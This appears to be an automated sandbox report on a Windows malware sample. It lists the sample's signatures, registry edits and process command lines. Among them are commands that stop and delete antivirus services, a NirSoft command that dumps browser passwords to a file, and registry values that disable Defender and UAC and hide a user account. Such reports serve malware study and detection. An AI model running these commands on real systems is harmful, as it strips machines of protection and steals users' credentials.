Analysis Overview
SHA256
b072506b100e143611b6b01f8e4ac35115665771f6f25685d1e5f5426cc7f03b
Threat Level: Known bad
The file bd38e93c22ab359d615e7464fd252363_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Modifies visibility of hidden/system files in Explorer
UAC bypass
Windows security bypass
Disables service(s)
RMS
Modifies Windows Defender Real-time Protection settings
Grants admin privileges
NirSoft WebBrowserPassView
Nirsoft
Blocklisted process makes network request
Stops running service(s)
Sets file to hidden
Blocks application from running via registry modification
Server Software Component: Terminal Services DLL
Possible privilege escalation attempt
Drops file in Drivers directory
Modifies Windows Firewall
Modifies file permissions
Cryptocurrency Miner
UPX packed file
Loads dropped DLL
Executes dropped EXE
ASPack v2.12-2.42
ACProtect 1.3x - 1.4x DLL software
Reads user/profile data of web browsers
Adds Run key to start application
Checks whether UAC is enabled
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Hide Artifacts: Hidden Users
AutoIT Executable
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Kills process with taskkill
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Gathers network information
Checks processor information in registry
Script User-Agent
Suspicious behavior: LoadsDriver
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Runs net.exe
Uses Task Scheduler COM API
Delays execution with timeout.exe
Suspicious behavior: SetClipboardViewer
Views/modifies file attributes
Runs .reg file with regedit
Scheduled Task/Job: Scheduled Task
System policy modification
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 15:51
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 15:51
Reported
2024-06-19 15:55
Platform
win10-20240404-en
Max time kernel
270s
Max time network
271s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
RMS
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\winit.exe | N/A |
| N/A | N/A | C:\Programdata\Windows\winit.exe | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Possible privilege escalation attempt
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Cryptocurrency Miner
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Programdata\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Programdata\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133632859547787188" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\programdata\microsoft\intel\P.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\MIME\Database | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\programdata\microsoft\intel\MOS.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Programdata\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe"
C:\ProgramData\Microsoft\Intel\Logs.exe
C:\ProgramData\Microsoft\Intel\Logs.exe -pnaxui
C:\ProgramData\Microsoft\Intel\winit.exe
C:\ProgramData\Microsoft\Intel\winit.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Microsoft\Intel\L.bat" "
C:\ProgramData\Microsoft\Intel\Cheat.exe
C:\ProgramData\Microsoft\Intel\Cheat.exe -pnaxui
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Programdata\Windows\install.vbs"
C:\Programdata\Windows\winit.exe
"C:\Programdata\Windows\winit.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\timeout.exe
timeout /t 3 /nobreak
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
C:\programdata\microsoft\intel\svchost.exe
"C:\programdata\microsoft\intel\svchost.exe"
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop swprv
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\sc.exe
sc stop swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config swprv start= disabled
C:\programdata\microsoft\rootsystem\P.exe
"C:\programdata\microsoft\rootsystem\P.exe"
C:\Windows\SysWOW64\sc.exe
sc config swprv start= disabled
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\programdata\microsoft\rootsystem\P.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\programdata\microsoft\rootsystem\1.exe
C:\programdata\microsoft\rootsystem\1.exe /LoadPasswordsIE=1 /LoadPasswordsFirefox=1 /LoadPasswordsChrome=1 /LoadPasswordsOpera=1 /LoadPasswordsSafari=1 /LoadPasswordsSeaMonkey=1 /LoadPasswordsYandex=1 /stext passwords.txt
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop crmsvc
C:\Windows\SysWOW64\sc.exe
sc stop crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Programdata\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
